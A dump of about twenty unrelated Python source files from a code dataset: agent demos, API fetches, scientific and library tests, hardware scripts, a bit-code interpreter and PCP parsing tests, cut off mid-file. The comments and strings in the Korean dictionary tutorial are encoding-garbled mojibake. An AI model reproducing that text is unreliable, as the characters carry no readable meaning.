content
stringlengths 5
1.05M
|
|---|
from osbrain import run_agent
from osbrain import run_nameserver
if __name__ == '__main__':
ns = run_nameserver()
alice = run_agent('Alice')
bob = run_agent('Bob')
addr = alice.bind('REP', handler=lambda agent, msg: 'Received ' + str(msg))
bob.connect(addr, alias='main')
for i in range(10):
bob.send('main', i)
reply = bob.recv('main')
print(reply)
ns.shutdown()
|
import time
#Writes to file
def writeFile(path, text):
file = open(path, "w")
file.write(text)
file.close()
#Appends to file
def appendFile(path, text):
file = open(path, "a")
file.write(text)
file.close()
#Prints with no new lines
def printn(text):
print(text, end="")
#Prints letter by letter
def lbl(text, speed=0.1):
for x in range(0,len(text)):
print(text[x], end="")
time.sleep(speed)
print()
|
#!/usr/bin/env python3
################################################################
# Example of using AlphaVantage API
# Sign up to get an API key and import it
# This script currently just gets the 5 latest values for bitcoin but can do others as well
# will eventually replace my powershell script at https://automationadmin.com/2020/09/ps-send-email-bitcoin
################################################################
import requests
from requests.auth import HTTPBasicAuth
import sys
from dotenv import load_dotenv
import os
import json
load_dotenv()
try:
api_key = os.environ["API_KEY"]
except KeyError:
print("Unable to get environmental variables")
except Exception as e:
print("Generic catch: Unable to get environmental variables")
print("Generic catch: " + str(e))
# funds = ["VFIFX", "VWUSX", "VTSAX", "BTCUSD"]
# for fund in funds:
# url = f"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY_ADJUSTED&symbol={fund}&apikey={api_key}"
# payload = {}
# headers = {
# 'Content-Type': 'application/json',
# }
# r = requests.request("GET", url, headers=headers, data=payload)
# print(r.text)
url = f"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY_ADJUSTED&symbol=BTCUSD&apikey={api_key}"
payload = {}
headers = {
'Content-Type': 'application/json',
}
r = requests.request("GET", url, headers=headers, data=payload)
req = r.json()
## print whole req
# print(req)
# print(dir(req))
## dump to file system
# filename = 'req.json'
# with open(filename, 'w') as f:
# json.dump(req, f)
## get all the keys and values
#print(req['Time Series (Daily)'])
## get just the keys
#print(req['Time Series (Daily)'].keys())
## sort them
keylist = list(req['Time Series (Daily)'].keys())
keylist.sort(reverse=True)
## give me just the top 5
print(keylist[0:5])
## print their values to make sure we got them
first_five_list = keylist[0:5]
for first_five in first_five_list:
print(req['Time Series (Daily)'][first_five])
|
from typing import NamedTuple
from string import ascii_letters
class UnknownLocaleError(Exception):
pass
class Locale(NamedTuple):
language: str
territory: str = ''
def __str__(self):
if self.territory:
return f'{self.language}_{self.territory}'
return self.language
@classmethod
def parse(cls, identifier, sep):
if not isinstance(identifier, str):
raise TypeError(f"Unexpected value for identifier: '{identifier}'")
locale = cls(*identifier.split(sep, 1))
if not all(x in ascii_letters for x in locale.language):
raise ValueError(f"expected only letters, got '{locale.language}'")
if len(locale.language) != 2:
raise UnknownLocaleError(f"unknown locale '{locale.language}'")
return locale
|
from __future__ import division
import hoomd
import hoomd.md
import unittest
hoomd.context.initialize();
# test the md.constrain.rigid() functionality
class test_log_energy_upon_run_command(unittest.TestCase):
def test_log(self):
uc = hoomd.lattice.unitcell(N = 1,
a1 = [10.8, 0, 0],
a2 = [0, 1.2, 0],
a3 = [0, 0, 1.2],
dimensions = 3,
position = [[0,0,0]],
type_name = ['R'],
mass = [1.0],
moment_inertia = [[0,
1/12*1.0*8**2,
1/12*1.0*8**2]],
orientation = [[1, 0, 0, 0]]);
system = hoomd.init.create_lattice(unitcell=uc, n=[8,18,18]);
system.particles.types.add('A')
rigid = hoomd.md.constrain.rigid()
rigid.set_param('R',
types=['A']*8,
positions=[(-4,0,0),(-3,0,0),(-2,0,0),(-1,0,0),
(1,0,0),(2,0,0),(3,0,0),(4,0,0)]);
rigid.create_bodies()
nl = hoomd.md.nlist.cell()
lj = hoomd.md.pair.lj(r_cut=3.0, nlist=nl)
lj.set_params(mode='shift')
lj.pair_coeff.set(['R', 'A'], ['R', 'A'], epsilon=1.0, sigma=1.0)
hoomd.md.integrate.mode_standard(dt=0.001);
rigid_gr = hoomd.group.rigid_center();
integrator=hoomd.md.integrate.langevin(group=rigid_gr, kT=1.0, seed=42);
log = hoomd.analyze.log(filename=None,
quantities=['potential_energy',
'translational_kinetic_energy',
'rotational_kinetic_energy', 'pressure'],
period=1,
overwrite=True);
hoomd.run(100);
self.last_l = None
def cb(timestep):
l = log.query('potential_energy')
if self.last_l is not None:
rel_dl = abs(l)/abs(self.last_l)
else:
rel_dl = 1.0
# the log value shouldn't change abruptly
self.assertTrue(rel_dl > 0.5)
self.assertTrue(rel_dl < 1.5)
self.last_l = l
for i in range(10):
hoomd.run(10,callback=cb, callback_period=1)
if __name__ == '__main__':
unittest.main(argv = ['test.py', '-v'])
|
# Copyright (C) 2010, 2011 Sebastian Thiel (byronimo@gmail.com) and contributors
#
# This module is part of GitDB and is released under
# the New BSD License: http://www.opensource.org/licenses/bsd-license.php
"""Performance tests for object store"""
from git.test.performance.lib import (
TestBigRepoR,
GlobalsItemDeletorMetaCls
)
from git.exc import UnsupportedOperation
import sys
import os
from time import time
import random
class PerfBaseDeletorMetaClass(GlobalsItemDeletorMetaCls):
ModuleToDelete = 'TestPurePackedODBPerformanceBase'
class TestPurePackedODBPerformanceBase(TestBigRepoR):
__metaclass__ = PerfBaseDeletorMetaClass
#{ Configuration
PackedODBCls = None
#} END configuration
@classmethod
def setUpAll(cls):
super(TestPurePackedODBPerformanceBase, cls).setUpAll()
if cls.PackedODBCls is None:
raise AssertionError("PackedODBCls must be set in subclass")
#END assert configuration
cls.ropdb = cls.PackedODBCls(cls.rorepo.db_path("pack"))
def test_pack_random_access(self):
pdb = self.ropdb
# sha lookup
st = time()
sha_list = list(pdb.sha_iter())
elapsed = time() - st
ns = len(sha_list)
print >> sys.stderr, "PDB: looked up %i shas by index in %f s ( %f shas/s )" % (ns, elapsed, ns / elapsed)
# sha lookup: best-case and worst case access
pdb_pack_info = pdb._pack_info
# END shuffle shas
st = time()
for sha in sha_list:
pdb_pack_info(sha)
# END for each sha to look up
elapsed = time() - st
# discard cache
del(pdb._entities)
pdb.entities()
print >> sys.stderr, "PDB: looked up %i sha in %i packs in %f s ( %f shas/s )" % (ns, len(pdb.entities()), elapsed, ns / elapsed)
# END for each random mode
# query info and streams only
max_items = 10000 # can wait longer when testing memory
for pdb_fun in (pdb.info, pdb.stream):
st = time()
for sha in sha_list[:max_items]:
pdb_fun(sha)
elapsed = time() - st
print >> sys.stderr, "PDB: Obtained %i object %s by sha in %f s ( %f items/s )" % (max_items, pdb_fun.__name__.upper(), elapsed, max_items / elapsed)
# END for each function
# retrieve stream and read all
max_items = 5000
pdb_stream = pdb.stream
total_size = 0
st = time()
for sha in sha_list[:max_items]:
stream = pdb_stream(sha)
stream.read()
total_size += stream.size
elapsed = time() - st
total_kib = total_size / 1000
print >> sys.stderr, "PDB: Obtained %i streams by sha and read all bytes totallying %i KiB ( %f KiB / s ) in %f s ( %f streams/s )" % (max_items, total_kib, total_kib/elapsed , elapsed, max_items / elapsed)
def test_correctness(self):
pdb = self.ropdb
# disabled for now as it used to work perfectly, checking big repositories takes a long time
print >> sys.stderr, "Endurance run: verify streaming of objects (crc and sha)"
for crc in range(2):
count = 0
st = time()
for entity in pdb.entities():
pack_verify = entity.is_valid_stream
sha_by_index = entity.index().sha
for index in xrange(entity.index().size()):
try:
assert pack_verify(sha_by_index(index), use_crc=crc)
count += 1
except UnsupportedOperation:
pass
# END ignore old indices
# END for each index
# END for each entity
elapsed = time() - st
print >> sys.stderr, "PDB: verified %i objects (crc=%i) in %f s ( %f objects/s )" % (count, crc, elapsed, count / elapsed)
# END for each verify mode
|
import sys
import json
from detect import Darknetv5Detector, Darknetv3Detector
from train import DarknetTrainer
def configure_json(json_path):
with open(json_path, 'r') as f:
s = f.read()
s = s.replace('\t', '')
s = s.replace('\n', '')
s = s.replace(',}', '}')
s = s.replace(',]', ']')
return json.loads(s)
def fetch_parameters():
params = configure_json("params.json")
detector_params = {
"images": params["detector_params"]["images_path"],
"destination": params["detector_params"]["destination_path"],
"yolo_version": params["detector_params"]["yolo_version"],
"yolov5_size": params["detector_params"]["yolov5_size"],
"cfg_path": params["detector_params"]["cfg_file_path"],
"weights_path": params["detector_params"]["weights_file_path"],
"resolution": params["detector_params"]["resolution"],
"confidence": params["detector_params"]["confidence"],
"nms_thresh": params["detector_params"]["nms_threshold"],
"CUDA": params["detector_params"]["CUDA"],
"TORCH": params["detector_params"]["use_torch_weights"],
}
trainer_params = {
"cfg_file": params["detector_params"]["cfg_file_path"],
"weights_file": params["detector_params"]["weights_file_path"],
"epoch": params["training_params"]["number_of_epoch"],
"batch_size": params["training_params"]["batch_size"],
"resolution": params["detector_params"]["resolution"],
"confidence": params["detector_params"]["confidence"],
"CUDA": params["detector_params"]["CUDA"],
"TUNE": params["training_params"]["start_from_checkpoint"],
}
validator_params = {
"annotation_dir": params["training_params"]["valid_annot_dir"],
"img_dir": params["training_params"]["valid_img_dir"],
}
train_params = {
"annotation_dir": params["training_params"]["train_annot_dir"],
"img_dir": params["training_params"]["train_img_dir"],
}
return detector_params, trainer_params, validator_params, train_params
def main():
if sys.argv[1] == "detect":
detector_params, _, _, _ = fetch_parameters()
if detector_params["yolo_version"] == 5:
detector = Darknetv5Detector(detector_params["images"],
detector_params["yolov5_size"],
detector_params["destination"])
elif detector_params["yolo_version"] == 3:
detector_params.pop("yolo_version")
detector_params.pop("yolov5_size")
detector = Darknetv3Detector(**detector_params)
else:
raise Exception("Unknown YOLO version !!")
detector()
elif sys.argv[1] == "train":
_, trainer_params, valid_params, train_params = fetch_parameters()
trainer = DarknetTrainer(**trainer_params)
trainer.get_validator(**valid_params)
trainer.train(**train_params)
else:
raise Exception("Unknown Command Error !!")
if __name__ == "__main__":
main()
|
import logging
from django.core.management import call_command
from django.utils import timezone
from model_bakery import baker
from fritzbox_thermostat_triggers.triggers.models import Thermostat
logger = logging.getLogger(__name__)
class MockedFritzbox:
def login(*args, **kwargs):
pass
def set_target_temperature(*args, **kwargs):
pass
def get_devices(*args, **kwargs):
pass
class MockedDevice:
def __init__(self, ain, name, target_temperature):
self.ain = ain
self.name = name
self.target_temperature = target_temperature
self.has_thermostat = True
def mocked_send_push_notification(message, title=None):
logger.debug(title)
logger.debug(message)
def test_command_sync_and_trigger_thermostats(db, monkeypatch):
# Setup
device_livingroom = MockedDevice("11962 0785015", "Living Room", 21)
device_kitchen = MockedDevice("11962 0785016", "Kitchen", 21)
thermostat_livingroom = baker.make(
"triggers.Thermostat", ain=device_livingroom.ain, name="Other name"
)
assert Thermostat.objects.count() == 1
assert thermostat_livingroom.name != device_livingroom.name
def mocked_get_fritzbox_connection():
return MockedFritzbox()
def mocked_get_fritzbox_thermostat_devices():
return [
device_livingroom,
device_kitchen,
]
monkeypatch.setattr(
(
"fritzbox_thermostat_triggers.triggers.management.commands."
"sync_and_trigger_thermostats.send_push_notification"
),
mocked_send_push_notification,
)
monkeypatch.setattr(
(
"fritzbox_thermostat_triggers.triggers.management.commands."
"sync_and_trigger_thermostats.get_fritzbox_connection"
),
mocked_get_fritzbox_connection,
)
monkeypatch.setattr(
(
"fritzbox_thermostat_triggers.triggers.management.commands."
"sync_and_trigger_thermostats.get_fritzbox_thermostat_devices"
),
mocked_get_fritzbox_thermostat_devices,
)
# Test
call_command("sync_and_trigger_thermostats")
# We did not specify Triggers and already have a Thermostat fetched,
# so the script will have skipped additional syncing.
assert Thermostat.objects.count() == 1
# Creating an active Trigger will help with that.
trigger = baker.make(
"triggers.Trigger",
thermostat=thermostat_livingroom,
name="my trigger",
temperature=0.0,
time=timezone.now(),
)
assert trigger.logs.count() == 0
# Ensure running the command multiple times in a short timespan
# does not actually do anything on top.
call_command("sync_and_trigger_thermostats")
call_command("sync_and_trigger_thermostats")
call_command("sync_and_trigger_thermostats")
# A new Device has been created by the sync, the existing one has
# its name corrected.
assert Thermostat.objects.count() == 2
thermostat_livingroom.refresh_from_db()
assert thermostat_livingroom.name == device_livingroom.name
thermostat_kitchen = Thermostat.objects.last()
assert thermostat_kitchen.ain == device_kitchen.ain
assert thermostat_kitchen.name == device_kitchen.name
# The Trigger has also been executed, logged and deactivated.
trigger.refresh_from_db()
assert not trigger.enabled
assert trigger.logs.count() == 1
log = trigger.logs.last()
assert log.triggered_at is not None
assert log.trigger == trigger
assert not log.no_op
# Running the sync against the same Trigger again won't do anything.
call_command("sync_and_trigger_thermostats")
trigger.refresh_from_db()
assert not trigger.enabled
assert trigger.logs.count() == 1
# This still holds true for a recurring Trigger.
trigger.recur_on_monday = True
trigger.recur_on_tuesday = True
trigger.recur_on_wednesday = True
trigger.recur_on_thursday = True
trigger.recur_on_friday = True
trigger.recur_on_saturday = True
trigger.recur_on_sunday = True
trigger.enabled = True
trigger.save()
call_command("sync_and_trigger_thermostats")
trigger.refresh_from_db()
assert trigger.enabled
assert trigger.logs.count() == 1
# If we remove the logs we can trigger it again though.
trigger.logs.all().delete()
assert trigger.logs.count() == 0
call_command("sync_and_trigger_thermostats")
trigger.refresh_from_db()
assert trigger.enabled
assert trigger.logs.count() == 1
|
# -*- coding: utf-8 -*-
from math import cos, sin
import time
from unicorn.utils import bracket
from base import EffectBase
class Rainbow(EffectBase):
"""
Largely borrowed from the Pimoromi examples.
"""
i = 0.0
offset = 30
def __init__(self, *args, **kwargs):
super(Rainbow, self).__init__(*args, **kwargs)
def run(self, stop):
while True:
self.i = self.i + 0.3
for y in range(self.height):
for x in range(self.width):
r = (cos((x + self.i) / 2.0) + cos((y + self.i) / 2.0)) * 64.0 + 128.0
g = (sin((x + self.i) / 1.5) + sin((y + self.i) / 2.0)) * 64.0 + 128.0
b = (sin((x + self.i) / 2.0) + cos((y + self.i) / 1.5)) * 64.0 + 128.0
r = int(bracket(r + self.offset))
g = int(bracket(g + self.offset))
b = int(bracket(b + self.offset))
self.uh.set_pixel(x, y, r, g, b)
if stop():
return
self.uh.show()
time.sleep(0.02)
|
import collections
import secrets
import statistics
import click
from gitkit.util.shell import get_output
def print_stats(title, lst):
print(title, "common", collections.Counter(lst).most_common(10))
print(title, "median", statistics.median(lst))
print(title, "mean ", statistics.mean(lst))
print(title, "minmax", min(lst), max(lst))
def get_git_message_lengths():
marker = secrets.token_urlsafe(16)
messages = get_output(f"git log '--pretty=%B{marker}'").split(marker)
first_line_lengths = []
rest_line_lengths = []
message_line_counts = []
message_lengths = []
for message in messages:
lines = [
line for line in (line.strip() for line in message.splitlines()) if line
]
if not lines:
continue
message_lengths.append(sum(len(line) for line in lines))
message_line_counts.append(len(lines))
first_line_lengths.append(len(lines.pop(0)))
for line in lines:
rest_line_lengths.append(len(line))
return (first_line_lengths, rest_line_lengths, message_line_counts, message_lengths)
@click.command()
def message_stats():
"""
Print out some statistics about the commit messages in the repo.
"""
(
first_line_lengths,
rest_line_lengths,
message_line_counts,
message_lengths,
) = get_git_message_lengths()
print_stats("first line", first_line_lengths)
print_stats("rest lines", rest_line_lengths)
print_stats("line count", message_line_counts)
print_stats("msg length", message_lengths)
|
import buildhat
import time
dist_sensor = buildhat.DistanceSensor('B')
motor = buildhat.Motor('A')
dist_sensor.eyes(0,0,50,50) # (Lup, Rup, Ldown, Rdown)
while True:
dist = dist_sensor.get()[0]
if dist > 0:
if dist < 50:
motor.run_for_degrees(30)
elif dist < 80:
print( motor.get_position())
time.sleep(1)
|
"""
tungsten
~~~~~~~~
Main module
"""
from .core import *
__title__ = 'tungsten'
__version__ = '0.1.1'
__author__ = 'Seena Burns'
__license__ = 'BSD'
__copyright__ = 'Copyright 2012 Seena Burns'
|
# ๋์
๋๋ฆฌ : ๋งคํ ์๋ฃ๊ตฌ์กฐ
# ํคkey์ ๊ฐvalue์ ์ฐ๊ฒฐ์ํค๋ ๋ฐฉ์์ผ๋ก ๋ฐ์ดํฐ๋ฅผ ๋ค๋ฃจ๋ ๋ฐฉ๋ฒ ์ ๊ณต
# ํค๋ ์ ์ฅ๋ ๋ฐ์ดํฐ๋ฅผ ์๋ณํ๊ธฐ ์ํ ๋ฒํธ๋ ์ด๋ฆ
# ๊ฐ์ ๊ฐ ํค์ ์ฐ๊ฒฐ๋์ด ์ ์ฅ๋ ํ
์ดํฐ
# ๋ฐ๋ผ์ ํค๋ง ์๋ฉด ๋ฐ์ดํฐ๋ฅผ ๋ฐ๋ก ์ฐพ์ ์ ์์
# ๋์
๋๋ฆฌ๋ {} ์ ํค:๊ฐ ํํ๋ก ์ด์ฉ
# ํค:๊ฐ์ด ์ฌ๋ฌ๊ฐ ์กด์ฌํ ๊ฒฝ์ฐ, ๋ก ๊ตฌ๋ถ
menu = { '1': 'newSungJuk', '2': 'showSungJuk',
'3': 'modifySungJuk' } # ํค๋ ๋ค์ํ ์๋ฃํ์ผ๋ก ์ฌ์ฉ
book = {
'bookid': '1',
'bookname': '์ถ๊ตฌ์์ญ์ฌ',
'publisher': '๊ตฟ์คํฌ์ธ ',
'price': '7000'
}
order = {
'orderid': '1',
'custid': '1',
'bookid': '1',
'saleprice': 6000,
'orderdate': '2014-07-01'
}
custromer = {
'custid': '1',
'name': '๋ฐ์ง์ฑ',
'address': '์๊ตญ ๋ฉ์ฒด์คํ',
'phone': '000-5000-0001'
}
print(book)
books_list = []
books_list.append( book ) # ์์ฑํ ๋์
๋๋ฆฌ๋ฅผ ๋ฐฐ์ด์ ์ ์ฅ
books_list.append( book )
books_list.append( book )
print( books_list )
# ๋์
๋๋ฆฌ ์ฒ๋ฆฌ ๋ฉ์๋
print( '1' in book ) # ๋์
๋๋ฆฌ์์ in ์ฐ์ฐ์๋ key๋ฅผ ๊ฒ์
print('bookid' in book)
print( book[ 'bookid' ] ) # ๋์
๋๋ฆฌ์์ ํค๋ก ๊ฒ์
print( book[ 'bookname' ] )
print( book[ 'price' ] )
# print( book[ 'orderid' ] ) # ์กด์ฌํ์ง ์๋ ํค ๊ฒ์์ ์ค๋ฅ!
print( book.get( 'bookname' ) )
print( book.get( 'orderid' ) ) # ์กด์ฌํ์ง ์๋ ํค ๊ฒ์์ None ์ถ๋ ฅ
bkname = book[ 'bookname' ] # ํค๋ก ๊ฒ์ํ ๊ฐ ์ถ๋ ฅ
print( bkname )
print( book.get( 'bookid' ) )
book[ 'bookid' ] = 99 # ํค๋ก ๊ฐ ์์
print( book.get( 'bookid' ) )
print( book )
book.update( { 'ํํ': '3 x 4' } ) # ์๋ก์ด ํค: ๊ฐ ์ถ๊ฐ
print( book )
print( book )
book.update( { 'ํํ': '6 x 10' } ) # ์๋ก์ด ํค: ๊ฐ ์์
print( book )
del book[ 'ํํ' ] # ๊ธฐ์กด ํค ์ญ์
print( book )
# book.clear() # ๋ชจ๋ ํค ์ญ์
print( book.keys() ) # ๋ชจ๋ ํค๋ฅผ ์ถ๋ ฅ
print( book.values() ) # ๋ชจ๋ ๊ฐ์ ์ถ๋ ฅ
print( book.items() ) # ๋ชจ๋ ํค:๊ฐ์ ํํ๋ก ์ถ๋ ฅ
items = book.items() # ๋ชจ๋ ํค:๊ฐ์ ํํ-๋ฆฌ์คํธ๋ก ์ถ๋ ฅ
print( list( items ) )
|
import math
import sys
def print_bytes(a):
bl=a.bit_length()//8
residue=a.bit_length()%8
if (residue!=0):
bl+=1
print(a.to_bytes(bl,"big"))
MODE_BINARY=0
MODE_8_BIT_ASCII=1
input_buffer=0
input_string=""
input_count=0
output_buffer=0
output_count=0
def my_output(bit, mode):
global output_buffer,output_count
if mode==MODE_BINARY:
print(end=str(bit))
elif mode==MODE_8_BIT_ASCII:
output_buffer<<=1
output_buffer+=bit
output_count+=1
if (output_count>=8):
print(end=chr(output_buffer))
output_count=0
output_buffer=0
def my_input(mode):
global input_buffer,input_string,input_count
if mode==MODE_BINARY:
while True:
bit_in=input()
if (not (bit_in=="0" or bit_in=="1")):
print("Input must be 0 or 1")
else:
return int(bit_in)
elif mode==MODE_8_BIT_ASCII:
if(input_count==0 or input_count>=8):
if (input_string==""):
input_string=input()
if (input_string==""):
input_buffer=0
input_string=""
input_count=0
else:
input_buffer=ord(input_string[0])
input_string=input_string[1:]
input_count=0
bit_in=input_buffer&128
input_count+=1
input_buffer<<=1
input_buffer%=256
return bit_in//128
def interpret(src_file, mode=MODE_BINARY):
src_file.seek(0,2)
size=src_file.tell()*8
line_length=3
line_num=1
while(True):
line_length=(line_num-1).bit_length()*2+3
if(size>line_length*line_num>=size-8):
break
line_num+=1
src_file.seek(0,0)
raw_bytes=src_file.read(-1)
entire_bitcode_in_int=int.from_bytes(raw_bytes,"big")
shift_1_bit=entire_bitcode_in_int.bit_length()-1
shift_x_bit=entire_bitcode_in_int.bit_length()-(line_num-1).bit_length()
mask_1_bit=1
mask_x_bit=(1<<(line_num-1).bit_length())-1
while(True):
A=(entire_bitcode_in_int>>shift_1_bit)&mask_1_bit
shift_1_bit-=1
shift_x_bit-=1
B=(entire_bitcode_in_int>>shift_x_bit)&mask_x_bit
shift_1_bit-=(line_num-1).bit_length()
shift_x_bit-=(line_num-1).bit_length()
C=(entire_bitcode_in_int>>shift_x_bit)&mask_x_bit
shift_1_bit-=(line_num-1).bit_length()
shift_x_bit-=(line_num-1).bit_length()
D=(entire_bitcode_in_int>>shift_1_bit)&mask_1_bit
shift_1_bit-=1
shift_x_bit-=1
E=(entire_bitcode_in_int>>shift_1_bit)&mask_1_bit
shift_1_bit-=1
shift_x_bit-=1
if (int(D)==1):
my_output(E,mode)
if(A==1):
bit_in=None
while(not (bit_in==0 or bit_in==1)):
bit_in=my_input(mode)
if(bit_in==0):
IP=B
else:
IP=C
else: #A==0
if (C==mask_x_bit):
break
IP=B
shift_1_bit=entire_bitcode_in_int.bit_length()-1-IP*line_length
shift_x_bit=entire_bitcode_in_int.bit_length()-(line_num-1).bit_length()-IP*line_length
print()
if __name__ == "__main__":
mode=MODE_BINARY
if (sys.argv[1]=="-a"):
src_file=open(sys.argv[2],"rb")
mode=MODE_8_BIT_ASCII
else:
src_file=open(sys.argv[1],"rb")
interpret(src_file,mode)
|
# -*-coding:utf-8-*-
__author__ = 'Tracy'
import xlrd,json,sys
reload(sys)
sys.setdefaultencoding('utf8')
with xlrd.open_workbook('numbers.xls', 'w') as f:
table = f.sheet_by_index(0)
rows = table.nrows
cols = table.ncols
lists = []
for row in range(rows):
list = []
for x in table.row_values(row):
list.append(x)
lists.append(list)
s = json.dumps(lists,ensure_ascii=False, indent=4)
content = '<?xml version="1.0" encoding="UTF-8"?>\n<root>\n<numbers>\n<!--\n ๆฐๅญไฟกๆฏ\n-->\n'
content = content + s + '\n</numbers>\n</root>'
with open('numbers.xml', 'w') as f:
f.write(content)
|
import unittest
from cdm.enums import CdmDataFormat
from cdm.objectmodel import CdmCorpusContext, CdmCorpusDefinition, CdmTypeAttributeDefinition
from cdm.utilities import TraitToPropertyMap
class TraitToPropertyMapTests(unittest.TestCase):
def test_trait_to_unknown_data_format(self):
"""Test trait to data format when unknown data format trait is in an attribute."""
cdm_attribute = CdmTypeAttributeDefinition(CdmCorpusContext(CdmCorpusDefinition(), None), 'SomeAttribute')
cdm_attribute.applied_traits.append('is.data_format.someRandomDataFormat')
trait_to_property_map = TraitToPropertyMap(cdm_attribute)
data_format = trait_to_property_map._traits_to_data_format(False)
self.assertEqual(CdmDataFormat.UNKNOWN, data_format)
def test_trait_to_json_data_format(self):
"""Test trait to data format when calculated data format should be JSON."""
cdm_attribute = CdmTypeAttributeDefinition(CdmCorpusContext(CdmCorpusDefinition(), None), 'SomeAttribute')
cdm_attribute.applied_traits.append('is.dataFormat.array')
cdm_attribute.applied_traits.append('means.content.text.JSON')
trait_to_property_map = TraitToPropertyMap(cdm_attribute)
data_format = trait_to_property_map._traits_to_data_format(False)
self.assertEqual(CdmDataFormat.JSON, data_format)
def test_update_and_fetch_list_lookup(self):
"""Test update and fetch list lookup default value without attributeValue and displayOrder."""
corpus = CdmCorpusDefinition()
cdm_attribute = CdmTypeAttributeDefinition(corpus.ctx, 'SomeAttribute')
trait_to_property_map = TraitToPropertyMap(cdm_attribute)
constant_values = [
{
'languageTag': 'en',
'displayText': 'Fax'
}
]
trait_to_property_map.update_property_value('defaultValue', constant_values)
result = trait_to_property_map.fetch_property_value('defaultValue')
self.assertEqual(1, len(result))
self.assertEqual('en', result[0].get('languageTag'))
self.assertEqual('Fax', result[0].get('displayText'))
self.assertIsNone(result[0].get('attributeValue'))
self.assertIsNone(result[0].get('displayOrder'))
|
def get_min_max(ints):
"""
Return a tuple(min, max) out of list of unsorted integers.
Args:
ints(list): list of integers containing one or more integers
"""
if ints == []:
return None
minimum = float('inf')
maximum = float('-inf')
for i in ints:
if i < minimum:
minimum = i
if i > maximum:
maximum = i
return (minimum, maximum)
## Example Test Case of Ten Integers
import random
l = [i for i in range(0, 10)] # a list containing 0 - 9
random.shuffle(l)
print ("Pass" if ((0, 9) == get_min_max(l)) else "Fail")
#own test_cases
print("Test Case 1 - Empty Array -> Return None")
input = []
solution = None
output = get_min_max(input)
print("Output: {0}".format(output))
assert(output == solution)
print("TestCase 1 passed! - Given output {0}; Expected output {1}".format(output, solution))
print("---------------------------")
print("Test Case 2 - length == 1")
input = [1]
solution = (1, 1)
output = get_min_max(input)
print("Output: {0}".format(output))
assert(output == solution)
print("TestCase 2 passed! - Given output {0}; Expected output {1}".format(output, solution))
print("---------------------------")
print("Test Case 3 - contains negative values")
input = [-1, -5, -10, -22]
solution = (-22, -1)
output = get_min_max(input)
print("Output: {0}".format(output))
assert(output == solution)
print("TestCase 3 passed! - Given output {0}; Expected output {1}".format(output, solution))
print("---------------------------")
print("Test Case 4 - positive and negative values")
input = [-1, -2, 5, -11, 123, -55]
solution = (-55, 123)
output = get_min_max(input)
print("Output: {0}".format(output))
assert(output == solution)
print("TestCase 4 passed! - Given output {0}; Expected output {1}".format(output, solution))
print("---------------------------")
print("Test Case 5 - one negative number")
input = [-5238559573295]
solution = (-5238559573295, -5238559573295)
output = get_min_max(input)
print("Output: {0}".format(output))
assert(output == solution)
print("TestCase 5 passed! - Given output {0}; Expected output {1}".format(output, solution))
print("---------------------------")
|
import unittest
from ..pcp import pcpmessage
#===============================================================================
class TestPcpMessage(unittest.TestCase):
def setUp(self):
self.pcp_client_ip = "192.168.1.1"
self.pcp_fields_request_map_common = {
'version': 2,
'message_type': pcpmessage.PcpMessageTypes.REQUEST,
'opcode': pcpmessage.PcpMessageOpcodes.MAP,
'lifetime': 300,
'pcp_client_ip': self.pcp_client_ip
}
self.pcp_fields_request_peer_common = dict(self.pcp_fields_request_map_common)
self.pcp_fields_request_peer_common['opcode'] = pcpmessage.PcpMessageOpcodes.PEER
self.pcp_fields_request_announce_common = dict(self.pcp_fields_request_map_common)
self.pcp_fields_request_announce_common['opcode'] = pcpmessage.PcpMessageOpcodes.ANNOUNCE
self.pcp_fields_response_map_common = {
'version': 2,
'message_type': pcpmessage.PcpMessageTypes.RESPONSE,
'opcode': pcpmessage.PcpMessageOpcodes.MAP,
'result_code': 1,
'lifetime': 300,
'epoch_time': 123461316
}
self.pcp_fields_map = {
'mapping_nonce': "0102030464ff8e110a090204",
'protocol': 0x11,
'internal_port': 1250,
'external_port': 5555,
'external_ip': "200.0.0.1"
}
self.pcp_fields_peer = {
'mapping_nonce': "0102030464ff8e110a090204",
'protocol': 0x11,
'internal_port': 1250,
'external_port': 5555,
'external_ip': "200.0.0.1",
'remote_peer_port': 4444,
'remote_peer_ip': "210.0.0.100"
}
self.pcp_data_request_map_common = (
'\x02\x01\x00\x00'
'\x00\x00\x01,'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xc0\xa8\x01\x01'
)
data_list = list(self.pcp_data_request_map_common)
message_type = ord(data_list[1]) >> 7
data_list[1] = chr(message_type | pcpmessage.PcpMessageOpcodes.PEER)
self.pcp_data_request_peer_common = ''.join(data_list)
data_list = list(self.pcp_data_request_map_common)
message_type = ord(data_list[1]) >> 7
data_list[1] = chr(message_type | pcpmessage.PcpMessageOpcodes.ANNOUNCE)
self.pcp_data_request_announce_common = ''.join(data_list)
self.pcp_data_map = (
'\x01\x02\x03\x04d\xff\x8e\x11\n\t\x02\x04'
'\x11\x00\x00\x00'
'\x04\xe2\x15\xb3'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xc8\x00\x00\x01'
)
self.pcp_data_peer = (
'\x01\x02\x03\x04d\xff\x8e\x11\n\t\x02\x04'
'\x11\x00\x00\x00'
'\x04\xe2\x15\xb3'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xc8\x00\x00\x01'
'\x11\\\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xd2\x00\x00d'
)
self.pcp_data_response_map_common = (
'\x02\x81\x00\x01'
'\x00\x00\x01,'
'\x07[\xde\xc4'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
)
def _test_parse_pcp_opcode(self, data, fields):
pcp_message = pcpmessage.PcpMessage.parse(data, self.pcp_client_ip)
for field_name in fields.keys():
self.assertEqual(
pcp_message[field_name], fields[field_name],
msg="{0}: {1} != {2}".format(field_name, pcp_message[field_name], fields[field_name]))
def test_parse_pcp_request_map(self):
fields = self.pcp_fields_request_map_common
fields.update(self.pcp_fields_map)
self._test_parse_pcp_opcode(
self.pcp_data_request_map_common + self.pcp_data_map, fields)
def test_parse_pcp_request_peer(self):
fields = self.pcp_fields_request_peer_common
fields.update(self.pcp_fields_peer)
self._test_parse_pcp_opcode(
self.pcp_data_request_peer_common + self.pcp_data_peer, fields)
def test_parse_pcp_request_announce(self):
self._test_parse_pcp_opcode(
self.pcp_data_request_announce_common, self.pcp_fields_request_announce_common)
def test_parse_pcp_message_data_length_less_than_minimum(self):
